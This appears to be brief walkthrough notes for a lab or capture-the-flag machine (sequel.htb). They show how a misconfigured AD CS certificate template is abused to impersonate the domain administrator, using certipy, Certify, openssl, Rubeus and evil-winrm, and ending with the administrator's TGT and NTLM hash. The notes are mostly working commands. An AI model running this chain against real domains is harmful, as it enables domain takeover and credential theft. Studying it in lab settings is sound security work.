Exploit without a shell
View vulnerable certificates
certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerable
Forge a new certificate
certipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Get the TGT and NTLM hash
certipy-ad auth -pfx administrator.pfx
Exploit via shell on machine
.\Certify.exe find /vulnerable
Enrollment rights are set for Domain Users as well which can be leveraged if you're in that group
We are requesting a ticket for our user but saying that our user is the administrator
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
Port 5986 (winrm) is open
Move the Private key contents to a key.pem file and the Public key to a key.cert file
evil-winrm -S -c key.cert -k key.pem -i dc.sequel.htb
Port 5986 is closed
Put certificate contents into a cert.pem file and convert to pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Upload Rubeus and newly made cert.pfx
.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap
/getcredentials /show /nowrap gives us the NTLM hash of the user
We can either use the ticket to login or the NTLM hash
